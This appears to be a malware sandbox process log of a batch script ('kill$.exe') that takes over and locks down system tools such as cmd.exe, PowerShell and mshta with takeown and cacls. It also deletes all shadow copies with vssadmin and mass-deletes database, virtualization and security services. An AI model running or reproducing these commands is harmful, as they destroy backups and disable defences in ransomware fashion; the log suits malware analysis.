cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe"
2252reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
2724takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
2760cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1808cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
1316cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2420cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
2892cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1296cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
2448cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1468cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
872cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2084cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
2988cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2660cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
2772cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1940cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
1572cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2680cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
1976takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
2092cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2720cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
2144cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
596cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
2408cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
852cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
1108cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2212cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
1164cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2384cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
2256cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3108cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3148cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3200cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3240cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3292cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3332takeown.exe takeown /f C:\Windows\system32\net.exe /a
3384cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3432cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
3472cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3524cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
3564cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3616cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
3656cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3708cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
3748cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3800cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
3840cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3892cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
3932cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3984cacls.exe cacls C:\Windows\system32\net.exe /e /d system
4024cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4076cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3096takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
3180cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3260cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3312cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3376cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3448cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3516cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3596cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3672cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
2248cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2344cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3660cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3792cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3872cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3952cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
4004cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4068cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3120takeown.exe takeown /f C:\Windows\system32\net1.exe /a
3232cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3256cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
3460cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3580cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
3644cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2428cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3740cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3856cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
3920cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4028cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3160cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3344cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
3536cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1452cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
3712cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3924cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3972takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
3320cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3512cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3488cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3884cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
2200cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3604cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3788cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3948cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3272cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3620cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
2356cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3584cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
2080cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3348cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
3944cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4108cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
4148takeown.exe takeown /f C:\Windows\system32\mshta.exe /a
4200cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4252cacls.exe cacls C:\Windows\system32\mshta.exe /g Administrators:f
4292cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4344cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Users:r
4384cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4436cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
4476cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4528cacls.exe cacls C:\Windows\system32\mshta.exe /e /d SERVICE
4568cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4620cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
4660cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4712cacls.exe cacls C:\Windows\system32\mshta.exe /e /d "network service"
4752cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4804cacls.exe cacls C:\Windows\system32\mshta.exe /e /d system
4844cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4896cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
4936takeown.exe takeown /f C:\Windows\SysWOW64\mshta.exe /a
4988cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5036cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
5076cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4104cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
4160cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2520cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
4284cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4364cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
4424cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4504cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
4560cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4636cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
4700cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4780cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d system
4832cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4912cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
4900takeown.exe takeown /f C:\Windows\system32\FTP.exe /a
5088cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4136cacls.exe cacls C:\Windows\system32\FTP.exe /g Administrators:f
4180cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4360cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Users:r
4388cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4580cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
2340cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4692cacls.exe cacls C:\Windows\system32\FTP.exe /e /d SERVICE
4708cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4916cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
5004cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5116cacls.exe cacls C:\Windows\system32\FTP.exe /e /d "network service"
4112cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4372cacls.exe cacls C:\Windows\system32\FTP.exe /e /d system
4296cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4556cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
4784takeown.exe takeown /f C:\Windows\SysWOW64\FTP.exe /a
4952cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4992cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
4196cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4464cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
4524cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4756cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
4848cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5016cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
4744cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5048cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
4956cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4908cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
2120cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4480cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d system
4240cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5156cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
5196takeown.exe takeown /f C:\Windows\system32\wscript.exe /a
5248cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5296cacls.exe cacls C:\Windows\system32\wscript.exe /g Administrators:f
5336cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5388cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Users:r
5428cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5480cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
5520cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5572cacls.exe cacls C:\Windows\system32\wscript.exe /e /d SERVICE
5612cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5664cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
5704cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5756cacls.exe cacls C:\Windows\system32\wscript.exe /e /d "network service"
5796cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5848cacls.exe cacls C:\Windows\system32\wscript.exe /e /d system
5888cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5940cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
5980takeown.exe takeown /f C:\Windows\SysWOW64\wscript.exe /a
6032cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6080cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
6120cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5188cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
5240cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5328cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
5384cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5392cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
5536cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5600cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
5616cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5776cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
5760cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5920cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d system
5972cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6048cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
6112takeown.exe takeown /f C:\Windows\system32\cscript.exe /a
6124cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5288cacls.exe cacls C:\Windows\system32\cscript.exe /g Administrators:f
5376cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5432cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Users:r
5588cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5720cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
5808cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5936cacls.exe cacls C:\Windows\system32\cscript.exe /e /d SERVICE
5916cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5132cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
5236cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5324cacls.exe cacls C:\Windows\system32\cscript.exe /e /d "network service"
5564cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5748cacls.exe cacls C:\Windows\system32\cscript.exe /e /d system
5900cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6060cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
5228takeown.exe takeown /f C:\Windows\SysWOW64\cscript.exe /a
5456cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5524cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
5944cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5448cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
5500cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6024cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
5540cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5420cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
5708cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5340cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
6168cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6220cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
6260cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6312cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d system
6352cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6404cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
6444takeown.exe takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
6496cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6544cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6584cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6636cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6676cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6728cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6768cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6820cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6884cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6936cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
6976cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7028cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
7068cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7120cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
7160cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2544cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6276takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
6340cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6424cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6484cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6560cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6624cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6704cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6756cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6832cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6896cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6956cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
2192cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7096cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
7132cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6236cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
6216cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6464cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6416takeown.exe takeown /f C:\ProgramData /a
6664cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6748cacls.exe cacls C:\ProgramData /g Administrators:f
6788cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6952cacls.exe cacls C:\ProgramData /e /g Users:r
6980cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6160cacls.exe cacls C:\ProgramData /e /g Administrators:r
6252cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6332cacls.exe cacls C:\ProgramData /e /d SERVICE
6612cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6740cacls.exe cacls C:\ProgramData /e /d mssqlserver
6824cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6968cacls.exe cacls C:\ProgramData /e /d "network service"
7124cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6524cacls.exe cacls C:\ProgramData /e /d system
6720cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6992cacls.exe cacls C:\ProgramData /e /d mssql$sqlexpress
6188takeown.exe takeown /f C:\Users\Public /a
6652cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6852cacls.exe cacls C:\Users\Public /g Administrators:f
6264cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6472cacls.exe cacls C:\Users\Public /e /g Users:r
6572cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6860cacls.exe cacls C:\Users\Public /e /g Administrators:r
6996cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7212cacls.exe cacls C:\Users\Public /e /d SERVICE
7252cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7304cacls.exe cacls C:\Users\Public /e /d mssqlserver
7344cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7396cacls.exe cacls C:\Users\Public /e /d "network service"
7460cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7512cacls.exe cacls C:\Users\Public /e /d system
7552cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7604cacls.exe cacls C:\Users\Public /e /d mssql$sqlexpress
7644vssadmin.exe vssadmin delete shadows /all /quiet
7696cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
7824sc.exe sc delete "XT800Service_Personal"
8056sc.exe sc delete SQLSERVERAGENT
7388sc.exe sc delete SQLWriter
8036sc.exe sc delete SQLBrowser
7440sc.exe sc delete MSSQLFDLauncher
8696sc.exe sc delete MSSQLSERVER
9132sc.exe sc delete QcSoftService
8736sc.exe sc delete MSSQLServerOLAPService
8748sc.exe sc delete VMTools
8428sc.exe sc delete VGAuthService
9656sc.exe sc delete MSDTC
9324sc.exe sc delete TeamViewer
9420sc.exe sc delete ReportServer
8992sc.exe sc delete RabbitMQ
8752sc.exe sc delete "AHS SERVICE"
8684sc.exe sc delete "Sense Shield Service"
10424sc.exe sc delete SSMonitorService
10764sc.exe sc delete SSSyncService
11060sc.exe sc delete TPlusStdAppService1300
10520sc.exe sc delete MSSQL$SQL2008
10808sc.exe sc delete SQLAgent$SQL2008
10572sc.exe sc delete TPlusStdTaskService1300
10404sc.exe sc delete TPlusStdUpgradeService1300
10976sc.exe sc delete VirboxWebServer
9288sc.exe sc delete jhi_service
11732sc.exe sc delete LMS
11396sc.exe sc delete "FontCache3.0.0.0"
12232sc.exe sc delete "OSP Service"
12108cmd.exe cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
7908sc.exe sc delete "DAService_TCP"
1856sc.exe sc delete "eCard-TTransServer"
7716sc.exe sc delete eCardMPService
7424sc.exe sc delete EnergyDataService
8424sc.exe sc delete UI0Detect
9016sc.exe sc delete K3MobileService
8800sc.exe sc delete TCPIDDAService
8196sc.exe sc delete WebAttendServer
8644sc.exe sc delete UIODetect
9812sc.exe sc delete "wanxiao-monitor"
8792sc.exe sc delete VMAuthdService
9708sc.exe sc delete VMUSBArbService
10004sc.exe sc delete VMwareHostd
8528sc.exe sc delete "vm-agent"
9440sc.exe sc delete VmAgentDaemon
10348sc.exe sc delete OpenSSHd
10644sc.exe sc delete eSightService
10960sc.exe sc delete apachezt
10416sc.exe sc delete Jenkins
10912sc.exe sc delete secbizsrv
8824sc.exe sc delete SQLTELEMETRY
10712sc.exe sc delete MSMQ
10396sc.exe sc delete smtpsvrJT
11144sc.exe sc delete zyb_sync
10984sc.exe sc delete 360EntHttpServer
11548sc.exe sc delete 360EntSvc
12008sc.exe sc delete 360EntClientSvc
11340sc.exe sc delete NFWebServer
12192sc.exe sc delete wampapache
11516sc.exe sc delete MSSEARCH
11572sc.exe sc delete msftesql
11784sc.exe sc delete "SyncBASE Service"
12152sc.exe sc delete OracleDBConcoleorcl
12616sc.exe sc delete OracleJobSchedulerORCL
12920sc.exe sc delete OracleMTSRecoveryService
12656cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
7996sc.exe sc delete OracleOraDb11g_home1ClrAgent
7232sc.exe sc delete OracleOraDb11g_home1TNSListener
8176sc.exe sc delete OracleVssWriterORCL
7592sc.exe sc delete OracleServiceORCL
8676sc.exe sc delete aspnet_state @sc delete Redis
8272sc.exe sc delete OracleVssWriterORCL
2424sc.exe sc delete JhTask
1460sc.exe sc delete ImeDictUpdateService
7324sc.exe sc delete XT800Service_Personal
9616sc.exe sc delete MCService
10128sc.exe sc delete ImeDictUpdateService
9500sc.exe sc delete allpass_redisservice_port21160
10108sc.exe sc delete "Flash Helper Service"
9956sc.exe sc delete "Kiwi Syslog Server"
9716sc.exe sc delete "UWS HiPriv Services"
9652cmd.exe cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc 